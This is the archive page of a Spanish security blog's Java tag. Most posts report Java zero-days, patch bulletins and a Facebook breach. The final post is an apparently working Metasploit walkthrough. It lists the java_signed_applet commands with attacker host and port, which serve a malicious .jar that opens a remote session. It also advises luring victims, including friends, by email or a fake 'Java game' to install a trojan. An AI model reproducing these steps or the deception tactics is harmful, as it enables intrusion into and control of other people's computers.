Este blog ya no está activo, sigue informándote aquí:

Mostrando entradas con la etiqueta Java. Mostrar todas las entradas
Mostrando entradas con la etiqueta Java. Mostrar todas las entradas

domingo, 6 de agosto de 2017

Mi hora de código 22 .- Java y Codeacademy

Ya sabéis que estamos de mudanzas de vacaciones y no tenemos mucho tiempo, pero eso no quiere decir que no tengamos tiempo para seguir aprendiendo y traeros el vídeo de cada domingo.

Hoy volvemos con una sección que teníamos tan olvidada como a Tonto pero que poco a poco la iremos retomando. Se trata de Mi hora de Código y ahora empezamos con Java. 


Sed Buenos ;)

lunes, 18 de marzo de 2013

Java.- Contador De Exploits/0-day

En estos meses las vulnerabilidades en Java han sido el [eje principal] de este blog y hemos hecho practicas de como utilizar estas vulnerabilidades con [Windows 7 y Windows 8]. Hasta día de hoy aun se ha podido erradicar los grandes fallos del producto, lo cual ha dado paso a la "comunidad" a crear paginas Webs algo divertidas para concienciar a Oracle de que tiene que invertir algo mas en seguridad para tapar esas vulnerabilidades. 


La web que mas me ha gustado es java-0day.com/ no solo se dedica a contabilizar el numero de exploits y vulnerabilidades que van saliendo sino que también los días que tarda Oracle en lanzar una solución. Ademas les ponen puntuación XD. Ademas, si realmente quieres saber si ahora mismo hay un 0-day en Java tienes la siguiente dirección istherejava0day.com/  Esta claro porqué tienes que desactivar Java si aun lo tienes 

viernes, 8 de marzo de 2013

Microsoft.- Siete Parches De Seguridad

Hace mucho que habíamos dejado el tema de las actualizaciones de un lado.  Pensad que para un sistema mínimamente seguro tendríais que tener todas las actualizaciones al día.  Por esta manera hoy toca hablar de los 7 parches que Microsoft tiene reservados para este martes. Cabe decir que 4 de los 7 son de caracter critico así que mucho ojo con lo que hacéis. 

"La compañía ha presentado una media de cerca de ocho  parches mensuales a lo largo de 2012, recuerda Andrew Storms, director de operaciones de seguridad en nCircle Security, y la cuenta aumenta este año, con los 12 del mes de febrero, lo que eleva la media hasta 9.Cuatro de los nuevos parches se han situado en el nivel más alto de virulencia en el ranking de la propia Microsoft, mientras que los otros tres se califican como “importantes”. 
El más notable de todos es el que afecta a todas las versiones de Internet Explorer desde la 6, que ya tiene 12 años, hasta la última IE10, que se acaba de publicar para la versión de IE10 para Windows 7 que comenzó a ver la luz la semana pasada en los primeros PCs no necesitará este parche, lo que demuestra que Microsoft va cerrando las vulnerabilidades sobre la marcha."
Pero no puedo acabar este articulo sin advertiros de que ya hay atacantes firmando applets Java (os debo una explicación coherente de ese termino) firmadas con certificados robados. 


sábado, 16 de febrero de 2013

Facebook.- Hackeado por un 0'day

Hace ya 15 días nos despertamos con la noticia de que [Twitter fue hackeado] afectando a mas de 250.000 cuentas que ya fueron avisadas de tal accidente. Este fallo ya fue reportado y parcheado por la compañía pero no solo se extendió a Twitter sino que Facebook también era vulnerable a él. 


Ayer la famosa red social dio a conocer el numero de ataques ciberneticos por parte de un grupo no identificado. Entre ellos vemos que también fue afectado por el mismo malware que hizo el horror en las cuentas de usuarios de Twitter. Se trata de una vulnerabilidad [0'day de Java el cual consiguió valer 5000$] en el mercado de estas vulnerabilidades. 

La empresa ya ha salido a la palestra con las siguientes declaraciones: 
"Last month, Facebook Security discovered that our systems had been targeted in a sophisticated attack,’ read the statement, despite the laptops being ‘fully-patched and running up-to-date anti-virus software."
El ataque se dió cuando algunos empleados de Facebook visitaron la pagina de un desarrollado de teléfonos móviles que estaba comprometida.

Así que si a principios de este mes no cambiasteis la contraseña de Facebook y Twitter, va siendo hora ^^

Fuente: http://thehackernews.com/2013/02/facebook-hacked-in-zero-day-attack.html


domingo, 20 de enero de 2013

Oracle y Sus 86 Vulnerabilidades Corregidas.

Últimamente Oracle y mas concretamente Java están en el punto de mira. Hace un par de semanas que no para de haber noticias relacionadas como por ejemplo el gran agujero que hubo el [11 de enero] o los malos buscando un 0'day para la nueva versión de la actualización de Java a un precio digno del  [17 de enero]


El día 17 de enero salió el primer boletín de seguridad del año el cual contenía 86 parches para diferentes vulnerabilidades en múltiples productos de Oracle. En resume, hace menos de una semana había la forma de  vulnerar todas las maquinas que utilizaran estos productos. Por esta razón, ya no veo este vídeo de la misma manera. 


Para ir acabando os dejo el boletín de seguridad para que echéis una vista de todas las vulnerabilidades que han sido parcheadas en este (como ellos lo llaman) Critical Patch. 


jueves, 17 de enero de 2013

5000$ Por Un Exploit 0 Day de Java 7 actualización 11

Hace 5 días os hable del [gran fallo de seguridad que tuvo Java]. Bueno esta vulnerabilidad fue [parcheada el día 13] de este mes dejando 2 ó 3 días de exposición publica. Vosotros me diréis que 2 días no son nada y yo os responderé que para los malos una vulnerabilidad como esa, que puede afectar a tantas maquinas, es una oportunidad de oro. 



Vale, ahora pongámonos en situación y si tu fueras un malo maloso y supieras de este fallo pero no supieras como crear un exploit ¿ Que harías . la respuesta está clara lo que no se arregla con dinero se arregla con mucho dinero. Así que no me sorprende noticias como estas: 
"Brian Krebs, quien encontró un anuncio para la explotación en un foro de hackers el lunes, revela que el autor ofreció vender el exploit a dos personas por el precio de 5.000$ (3.750€). El vendedor prometió a los compradores una versión "cifrada" y "armada" de la explotación.
En el anuncio que publicó, el vendedor afirma que la explotación no fue integrada en ningún kit de explotación conocido, ni siquiera en el caro Cool Exploit Kit.
Según Krebs, probablemente el ciberdelincuente ya encontró compradores ya que la entrada fue eliminada del foro.
Esto demuestra que el Departamento de Seguridad Nacional de EEUU hace lo correcto al asesorar a los usuarios desinstalar Java si no lo necesitan para sus tareas diarias."
 Si, hay gente que paga por este tipo de "exclusividades" y ya podéis pensar para que los utilizan. Ademas ya han advertido de que hay vulnerabilidades anteriores que no pueden estar corregidas aunque Oracle haya lanzado su actualización.

viernes, 11 de enero de 2013

Java Es Violado Por un Importante Fallo de Seguridad

Java, un software que se encuentra instalado en cientos de millones de ordenadores en todo el mundo, es un lenguaje de programación que permite a los programadores escribir software usando un solo juego de código. Este, además, puede ejecutarse en prácticamente cualquier tipo de ordenador.



La vulnerabilidad, que afecta a Java 7 (1.7) Update 10, permite la ejecución remota de código en el sistema afectado. Los expertos en seguridad califican a este fallo de seguridad como “muy grave” y aconsejan a los usuarios que, hasta que no haya una solución, desactiven Java.
Java es un desastre. No es seguro", dijo el director de laboratorio de AlienVault Labs, Jaime Blasco. "Hay que desactivarlo", agregó.
Ya hablamos de lo bien que va [java para colarse en los sistemas ajenos]. Pretendo hacer una prueva con los nuevos exploits pero, hasta que no se actualice el metasploit, podéis encontrar mas información aquí: http://calebbucker.blogspot.com.es/

Fuente: http://www.laflecha.net


lunes, 3 de diciembre de 2012

Explotando Windows 8 Gracias a Java y Metasploit

Hace ya un tiempo que Java es el disfrute de aquellos que desean introducirse en nuestras maquinas. El agujero de seguridad es tan grade que hizo que Microsoft se replanteara su uso a la salida de Windows 8. Aunque la nueva versión del S.O (para tabletas la verdad que es una maravilla) aportó una multitud de funciones para la seguridad de nuestros equipos esa decisión le paso factura y ahora veremos como de fácil le seria a alguien explotar esa vulnerabilidad.


El proceso es fácil, rápido y solo necesitamos los siguientes Ingredientes: 
    • Distribución Linux:  Backtrack 5 - R3 ( R1 y R2 también sirven pero ya que estáis bajaros la ultima versión desde la pagina oficial que es gratis. ) http://www.backtrack-linux.org/
    • Tener instalado el Metasploit Frameworks (Si os habeis bajado la ultima versión viene de serie con el S.O)
    • Un Windows 8 
    • Internet Explorer, Mozilla FireFox, Google Chrome (si, todos se lo comen)

Básicamente vamos a utilizar [java_signed_applet]. Nos crearemos un archivo .Jar vía Metasploit y se lo colaremos a la victima mediante una pagina web la cual abrirá, automáticamente, un cuadro de dialogo para que la victima acepte y le colemos el malware. (Resumen básico y rápido)

Código:
    • msfconsole <-- con este comando abrimos a Metasploit 
    • use java_signed_applet <-- selecionamos el exploit que os he explicado antes
    • set  lhost 192.168.1.31 <-- definimos la IP del atacante por la cual nos pondremos a la escucha en el momento que entre en la web.
    • set lport 80 <--  (definimos el puerto del atacante, también sera importante para escuchar mas adelante) 
    • set URIPATH / <-- hay un espacio enre Uripath y la [/] este comando sirve para crear un Identidicador de Recursos Uniforme de forma aleatoria. URI es una cadena caracteres la cual se utiliza para identificar un nombre o un recurso. 
    • exploit <-- ejecutamos el exploit 
Con esto ya tendremos montada la pagina web con una dirección http://192.168.xxx.xxx.xxx esto lo ponemos en algún mail o se lo pasamos a algún colega diciéndole que mire que juego java mas chulo he hecho en clase de programación o lo ocultamos de alguna manera. (yo solo os pongo el método de ataque el arte ninja corre de vuestra parte o os presentáis en mis conferencias xD)


Una vez que una victima haya picado el anzuelo le aparecerá la siguiente venta. Cabe remarcar que yo he utilizado este exploit tanto en windows 7 como en windows 8 y el resultado es el mismo. 

Internet Explorer en Windows 8

Como es el juego de un colega o la trola que os hayáis inventado será bueno, por lo que lo aceptara y nosotros veremos como el Malware empieza a funcionar mostrando que se envía el archivo SITE LOADER.JAR (como podeis ver hay 2 IPs diferentes corresponden al Windows 8 y a Windows 7 anterior mente mencionados como veis a los 2 ha sido enviado)

Perfecto ahora solo queda que el "colega" haga aceptar otra vez en el panel de SiteLoader y para dentro. Que cuele ya depende de vuestra Ingeniería social. Pero lo que os quiero hacer ver es que muchas veces salen carteles de estos y pocos somos los que le damos a cancelar, o nos los miramos mínimamente.

Como veis la barra de arriba ha cambiado un poco eso es que estoy utilizando Windows 7

Después ya tendrá un bonito troyano dentro al cual le podremos decir que haga las mil maravillas.

_________________________________________________________
Las Gracias A Quienes Se Las Merecen:
---------------------------------------------------------------------------------------------